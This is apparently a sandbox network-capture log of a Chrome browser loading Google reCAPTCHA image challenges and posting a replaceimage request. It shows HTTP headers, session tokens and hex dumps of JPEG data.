                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  106192.168.2.1649837142.250.186.1644437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC858OUTGET /recaptcha/api2/payload?p=06AFcWeA5VkcAf__VfTECYjxR1zEjzEeUqVCOpmy-ToMC2oDpihFBDApkF8YSBcGEFkDfjNL2dpJ0UkZxupvRNtyeNT3I-AyHNENAwb2_-DZOzGTlUQhzKcFMf65SiWoFSAE7eERvRg56uYB2WYqJiFCyof5l6Ujg7_TfkOu8WyD8wBDc7sMz5db5AsNDucIwFkZC3Wv7YQcOYnOMgB2ZRVWzf__aR6mJjrA&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=3b23377149f960fd HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:11:05 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:05 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC697INData Raw: 66 33 33 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14
                                                                                                                                                                                                                                                                  Data Ascii: f33JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC1378INData Raw: 06 c0 2c 4f 5e 9c d7 d1 5f 0b 9e 1b af 0e 35 ec 5a bd c5 fb dc 38 92 68 a4 9b cc 16 d2 11 ca 29 ea 17 da b0 c3 54 73 8d a5 b9 75 a0 a3 aa 3a 4d b5 4b 57 d4 f4 ed 32 25 fe d3 ba fb 1c 32 82 04 ee 19 63 53 ee e3 85 3e 99 22 b4 f6 d3 67 b5 b7 bc b7 7b 6b 98 52 68 5c 6d 64 75 04 11 5d 28 c4 f9 d3 e3 66 8d ab dc d9 de cf 7d ac 5c eb 56 b6 28 ee 92 c6 e9 fb 86 c8 2c 24 40 78 1d 30 46 3e e8 e3 a1 af 16 d3 c9 33 46 90 c2 65 12 a1 da c7 bf bf e9 5e eb f1 af 40 d0 74 ab 6f ec 46 b5 9a 3b a9 17 65 8d da 5c 16 67 8c e4 98 e4 5d d9 38 c7 04 f0 72 78 e2 bc fb c0 fe 16 d7 f4 df b6 6b 3a 56 9b a6 ea 0f a6 c0 25 92 3b a6 06 32 1b 39 62 a4 8c 95 03 80 3b e2 b3 ab 28 36 a2 de a3 a4 a5 ab e8 6f 78 52 c6 ef fe 11 5b cb 2d 66 7b 9b 0d 21 65 33 25 e4 53 95 b7 49 00 39 52 aa 19
                                                                                                                                                                                                                                                                  Data Ascii: ,O^_5Z8h)Tsu:MKW2%2cS>"g{kRh\mdu](f}\V(,$@x0F>3Fe^@toF;e\g]8rxk:V%;29b;(6oxR[-f{!e3%SI9R
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC1378INData Raw: eb a2 d0 35 0b 9b 66 d4 21 4b 84 b4 6c b4 26 52 15 88 3d 33 bb 9c fa d7 23 a7 15 aa 77 3a 23 37 aa 68 e7 ce ad a7 69 b6 ec 75 f4 9e ff 00 53 8d e1 fd ca a1 68 67 e5 5b 0e 36 e0 29 20 e7 9e 33 d0 d7 8d 78 b7 50 bf 8b 53 bb 8a ea 08 e2 b6 79 0c b1 25 be 00 45 25 b0 06 39 c0 c9 18 35 ee b7 de 14 d5 6e a2 77 1f 68 99 07 2e cb 24 58 1f 53 8a a3 ff 00 08 34 d7 56 73 b2 e8 cd 79 34 71 33 0c cb 6e d8 18 fc eb 58 cd 58 4c e6 63 f8 a0 3c 3f e1 86 d3 2c 2c 6e db 50 5b 78 71 72 f7 a4 ae f3 18 27 0a 72 14 0c 9c 28 e2 bc bb 52 f1 05 ce a7 76 b7 f7 d7 37 42 ee 77 33 16 32 e4 ee 07 19 e0 7b 76 ac 7b 2b bb ab fb 66 96 de d6 fe 2b 71 20 0d 3a 46 d2 46 ae 08 1c 9e 31 f7 87 7e e2 ba cd 3b 5a d1 61 b2 b4 b1 be f0 ed ae a2 e4 f9 4b 70 65 92 36 90 9e a5 be 70 06 49 1d b8 ae 4c
                                                                                                                                                                                                                                                                  Data Ascii: 5f!Kl&R=3#w:#7hiuShg[6) 3xPSy%E%95nwh.$XS4Vsy4q3nXXLc<?,,nP[xqr'r(Rv7Bw32{v{+f+q :FF1~;ZaKpe6pIL
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC445INData Raw: af f1 cf c2 80 7c 96 ba 9b ff 00 db 24 1f fb 35 7c d4 ac 31 cd 1b b1 d2 9f d4 a9 8b eb 33 67 d1 e7 e3 af 86 c1 cf d8 75 42 3f dd 8c 7f 5a 54 f8 ff 00 a0 c4 c1 a3 d2 b5 20 47 70 c8 0f f3 af 9b 59 cf 24 11 4d 32 e3 93 4f ea 54 fa 8f db cc fa 23 5a f8 dd e1 2d 59 3f e2 63 e1 99 ef 98 0c 03 32 c6 c4 0f 40 4e 48 ac 61 f1 5f c1 51 ff 00 ab f0 42 aa 8e db d3 ff 00 89 af 13 12 29 14 a8 c8 0e 5c 16 f6 07 14 be a9 4c 3d bc cf 6e 87 e3 1f 84 23 7d f0 f8 33 6b 0e e1 d0 7f ec b5 a7 07 c7 fd 3a 36 fd d6 87 a8 c2 07 4d 97 55 e0 8d 2c 0b 86 8a d9 49 1c 90 c7 39 ab 30 6a 32 ec cc 50 c3 1a e7 b2 8c fe 34 9e 16 9f 61 7b 79 9e f5 ff 00 0d 0c a7 ee 69 5a be 3f eb e6 8a f0 66 bf be 27 89 ca 8f 40 07 f8 51 47 d5 a9 8b db c8 cb 2d 9a 8e 67 3d 28 27 b1 35 0b e4 be 33 c5 76 48 c1
                                                                                                                                                                                                                                                                  Data Ascii: |$5|13guB?ZT GpY$M2OT#Z-Y?c2@NHa_QB)\L=n#}3k:6MU,I90j2P4a{yiZ?f'@QG-g=('53vH
                                                                                                                                                                                                                                                                  2024-10-29 19:11:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  107192.168.2.1649838142.250.186.1644437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:06 UTC858OUTGET /recaptcha/api2/payload?p=06AFcWeA7hWBNHMulugtwoVWu7X763ky27tPptOgTfOFgi0ix1mEsIbU1bV0fMrExjgEe-XsEDkSQQ-scQizQ4ie4ZKTRVXCMEJg7q5bRV1gkwixSdbl21ToeD4P9mpA7Laa8XaFr4zFrMcnN40ikXzItuICvb2_osnQeehe4--t1C7gr2i6nMa9QSddKi7xInP1h-SiEKj2cy6oKqzHeLl4B_GLV50U1Rqg&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF&id=bda71fdb839543f2 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:07 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:11:06 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:06 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:07 UTC697INData Raw: 66 32 39 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 00 64 00 64 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14
                                                                                                                                                                                                                                                                  Data Ascii: f29JFIFC!"$"$Cdd"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:11:07 UTC1378INData Raw: d2 4a c3 cd 25 ee 23 0a 63 0c 3f 77 b9 ba 8f 4e 0e 78 fe 55 9c 5b 93 72 7a 1a c2 36 56 6c e8 2f 75 77 ba bc 9a e7 09 13 44 76 2b af df 20 77 07 b8 a9 f4 8d 63 55 fb 44 de 46 b3 73 00 43 fc 24 9d c3 9c 67 07 d0 55 0b fb 48 6f 1d ae 16 7b 93 fb b7 55 8d a3 0a 77 f2 33 f4 c8 e3 3d 8d 1f b8 b1 b6 69 24 92 de 15 8d f7 49 b9 b2 db 70 38 2b db b7 3d f3 55 19 bb 6a 2a 90 4a 4e cc db d3 75 a7 17 91 5f 6a ba 9b 39 cb 83 2c 84 9c f0 30 31 db ad 6b d9 ea 9a 65 e5 cd d4 70 38 94 4c 84 87 56 52 ab 81 dc 63 23 f5 ae 52 04 b0 d7 2e ed ed b4 c7 86 62 db 89 83 0c 48 24 a7 00 28 c9 e7 b0 ff 00 eb 54 f2 69 56 fa 7c a8 6e 63 86 6c 00 44 2a c5 19 49 c3 67 0e 13 23 9e d9 ea 3b 73 42 95 f5 42 45 cf 89 13 4b 6d a5 d9 4d 14 de 5c b1 ea c8 f1 b9 df 94 21 58 83 f3 0e 9f 4e 29 f7 3e
                                                                                                                                                                                                                                                                  Data Ascii: J%#c?wNxU[rz6Vl/uwDv+ wcUDFsC$gUHo{Uw3=i$Ip8+=Uj*JNu_j9,01kep8LVRc#R.bH$(TiV|nclD*Ig#;sBBEKmM\!XN)>
                                                                                                                                                                                                                                                                  2024-10-29 19:11:07 UTC1378INData Raw: fe bf 43 df f3 ae 87 c7 7e 18 fb 6b 9d 67 47 fd ce a5 1f 2e 8b c7 9d ff 00 d9 7f 3a 1f 90 2b 1e 7a 6f 26 12 36 cd 1e 76 4e ab bb 76 71 8f 61 57 ec 6e 67 b9 0d e6 e9 b3 5b 6d fe 23 b8 86 fd 2a de 8f aa 25 fb 18 26 45 8a f1 7a c6 df 28 6f 52 3d fd aa f9 3b 07 98 92 01 83 82 0f 04 1f 4c 56 37 68 bd 05 1a 1e b6 2d be d4 34 ab e3 6f b7 70 95 60 62 98 f5 ce 3a 54 76 da 6e a7 72 09 b7 d3 ae e5 db f7 bc b8 59 b1 f9 0a da d1 bc 49 7b a6 30 30 4c c9 c7 2a 06 55 fe a0 ff 00 fa fd c5 6c c5 7b a5 ea 77 5f 68 92 d2 df 49 bc ea 97 76 ec f1 a6 7f da da 78 fa fe b5 a4 59 94 91 c1 ca 92 c5 23 47 22 f9 6e a7 05 5f e5 23 ea 0d 15 e9 57 d3 78 aa 19 84 6b 06 8b a9 a0 51 b2 e1 a1 2c 48 ed 92 4f f8 d1 5a 11 63 2f e1 57 86 5b 49 d3 ce a1 77 1e 2f ae 40 c8 23 98 d3 a8 5f af 73 f8
                                                                                                                                                                                                                                                                  Data Ascii: C~kgG.:+zo&6vNvqaWng[m#*%&Ez(oR=;LV7h-4op`b:TvnrYI{00L*Ul{w_hIvxY#G"n_#WxkQ,HOZc/W[Iw/@#_s
                                                                                                                                                                                                                                                                  2024-10-29 19:11:07 UTC435INData Raw: a4 b6 f1 0c 2f ba 3b cd 5b e5 c9 1b a2 91 47 d3 84 fe bf fd 75 27 3b ec 0f 2d 8d fd da b1 65 1d 63 58 fe cd 99 84 fa 7e ad 21 5e 4e cb 27 c7 e6 40 1f ad 73 77 9f 12 12 12 d1 db e9 32 ee 1d e7 93 66 3f 00 0f f3 ae ca ee ff 00 c4 26 03 e6 dd 5d ca 63 19 1b b7 e4 0c e3 80 47 5a d5 f0 4d ac fe 21 7b c8 75 ab 78 ef e0 89 17 6a dc 5b 26 41 24 f7 db cf 4a d2 32 8b 76 31 af 97 54 a5 49 d5 e6 4d 23 c7 2f bc 7f af 4c 4f 92 6d ad 41 e9 e5 c7 b8 8f c5 b3 58 5a 86 b7 ab 5f e4 5d ea 37 32 a9 ea a6 43 b7 f2 1c 57 bf f8 87 e1 2f 86 75 88 64 1a 79 4d 2e ec 74 31 8e 01 f7 4c ff 00 2c 57 8c 78 e3 c0 7e 23 f0 8b 6e d4 ec bc cb 46 6c 25 e4 3f 3c 2d e9 93 8f 94 fb 1c 56 dc b6 3c be 64 ce 54 8c fa 51 4c 66 f9 ba 7e b8 a2 a6 c5 29 1f 68 95 1e 95 5d d8 8b 94 85 78 0c 33 9e f4 51
                                                                                                                                                                                                                                                                  Data Ascii: /;[Gu';-ecX~!^N'@sw2f?&]cGZM!{uxj[&A$J2v1TIM#/LOmAXZ_]72CW/udyM.t1L,Wx~#nFl%?<-V<dTQLf~)h]x3Q
                                                                                                                                                                                                                                                                  2024-10-29 19:11:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  108192.168.2.1649839142.250.184.2284437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:08 UTC998OUTPOST /recaptcha/api2/replaceimage?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 5858
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.google.com
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:08 UTC5858OUTData Raw: 76 3d 2d 5a 47 37 42 43 39 54 78 43 56 45 62 7a 49 4f 32 6d 34 32 39 75 73 62 26 63 3d 30 33 41 46 63 57 65 41 36 69 6a 71 44 52 4a 4e 55 76 55 4a 4c 47 7a 49 68 69 42 63 36 75 31 4f 76 65 62 45 50 46 62 44 5a 47 66 52 64 44 42 75 6a 75 45 48 46 4a 64 63 30 31 55 6b 63 51 69 6b 73 51 34 6a 47 47 46 6e 6a 75 46 65 70 44 72 69 59 68 51 63 31 73 34 6f 4e 2d 63 37 7a 31 63 69 5a 36 52 35 57 51 66 57 31 34 77 75 57 65 4a 78 6c 7a 72 30 61 53 70 32 58 68 55 6c 31 50 4a 7a 58 42 57 4d 4c 6e 42 66 52 73 41 4c 47 70 2d 38 42 65 68 53 36 30 53 43 73 5a 43 79 33 4d 66 70 6c 52 72 68 6c 55 30 69 6b 76 4c 6a 71 49 6b 53 77 48 57 58 4f 78 6f 4a 30 56 72 35 74 6a 69 51 61 67 45 7a 63 39 4f 65 32 53 38 70 46 78 6b 52 42 32 68 54 59 76 32 6c 36 50 6c 74 48 4e 42 57 68 62
                                                                                                                                                                                                                                                                  Data Ascii: v=-ZG7BC9TxCVEbzIO2m429usb&c=03AFcWeA6ijqDRJNUvUJLGzIhiBc6u1OvebEPFbDZGfRdDBujuEHFJdc01UkcQiksQ4jGGFnjuFepDriYhQc1s4oN-c7z1ciZ6R5WQfW14wuWeJxlzr0aSp2XhUl1PJzXBWMLnBfRsALGp-8BehS60SCsZCy3MfplRrhlU0ikvLjqIkSwHWXOxoJ0Vr5tjiQagEzc9Oe2S8pFxkRB2hTYv2l6PltHNBWhb
                                                                                                                                                                                                                                                                  2024-10-29 19:11:08 UTC694INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:08 GMT
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:11:08 UTC684INData Raw: 31 37 65 35 0d 0a 29 5d 7d 27 0a 5b 22 64 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 37 41 39 54 39 6f 30 65 6a 52 70 32 5a 58 50 6d 43 78 55 77 70 70 34 67 7a 75 38 6f 4f 45 33 78 72 55 74 42 5f 6d 66 73 44 4a 47 76 55 64 49 43 4d 33 39 47 4a 4e 6a 34 43 76 31 32 36 55 78 65 32 36 36 50 5f 35 52 32 34 5a 67 50 42 74 7a 44 74 41 49 36 55 45 52 70 55 75 43 66 4c 5f 4b 6a 65 6e 45 70 73 58 5f 52 37 36 33 66 55 48 43 31 62 47 4a 73 6d 78 6f 72 72 69 49 47 65 35 61 44 6f 79 56 43 52 50 44 70 6c 37 35 31 38 6f 4b 71 54 43 6e 67 76 4f 7a 32 75 56 35 45 41 4c 7a 4b 73 31 51 54 75 54 74 4f 75 30 52 79 6c 33 4b 50 64 31 48 73 46 6c 74 51 37 41 71 4a 4a 53 68 61 31 72 55 67 75 4e 37 57 4e 52 4b 6e 6c 31 53 5f 56 47 54 45 6c 43 62 34 68 49 58 4c 47 44 63 2d 4a 4c
                                                                                                                                                                                                                                                                  Data Ascii: 17e5)]}'["dresp","03AFcWeA7A9T9o0ejRp2ZXPmCxUwpp4gzu8oOE3xrUtB_mfsDJGvUdICM39GJNj4Cv126Uxe266P_5R24ZgPBtzDtAI6UERpUuCfL_KjenEpsX_R763fUHC1bGJsmxorriIGe5aDoyVCRPDpl7518oKqTCngvOz2uV5EALzKs1QTuTtOu0Ryl3KPd1HsFltQ7AqJJSha1rUguN7WNRKnl1S_VGTElCb4hIXLGDc-JL
                                                                                                                                                                                                                                                                  2024-10-29 19:11:08 UTC1378INData Raw: 79 6d 31 77 35 79 4d 43 4e 59 57 4d 4d 73 69 31 57 6b 54 41 41 63 6b 62 6f 76 41 69 47 6c 6b 43 58 67 53 35 64 67 47 35 5f 4d 44 6e 5a 49 72 67 50 7a 42 55 39 6f 71 73 44 4f 38 71 63 44 34 68 77 2d 4e 69 6a 4b 76 6f 75 73 70 53 4a 79 37 46 59 42 58 62 62 4c 7a 61 7a 75 5a 53 32 4f 62 6d 76 4b 58 65 67 6e 4b 77 72 67 74 64 78 36 38 62 55 6e 56 46 6a 75 69 67 33 2d 6f 46 4c 65 2d 61 74 37 2d 7a 31 52 65 71 6d 35 6d 77 6b 6e 51 32 61 55 64 6e 41 31 34 4c 31 33 72 6a 5f 35 71 69 75 67 63 4d 44 2d 31 6e 46 34 32 65 31 4a 65 6c 37 2d 32 46 39 6a 46 69 61 36 39 61 4d 4e 47 5f 50 69 65 5f 49 5a 55 74 55 32 42 63 6f 49 44 65 51 45 50 57 4f 62 41 74 2d 7a 6e 4f 6b 65 64 70 46 34 67 48 35 52 6c 72 39 66 50 58 45 33 32 62 30 41 6c 57 67 5f 47 70 2d 54 57 6b 39 63 73
                                                                                                                                                                                                                                                                  Data Ascii: ym1w5yMCNYWMMsi1WkTAAckbovAiGlkCXgS5dgG5_MDnZIrgPzBU9oqsDO8qcD4hw-NijKvouspSJy7FYBXbbLzazuZS2ObmvKXegnKwrgtdx68bUnVFjuig3-oFLe-at7-z1Reqm5mwknQ2aUdnA14L13rj_5qiugcMD-1nF42e1Jel7-2F9jFia69aMNG_Pie_IZUtU2BcoIDeQEPWObAt-znOkedpF4gH5Rlr9fPXE32b0AlWg_Gp-TWk9cs
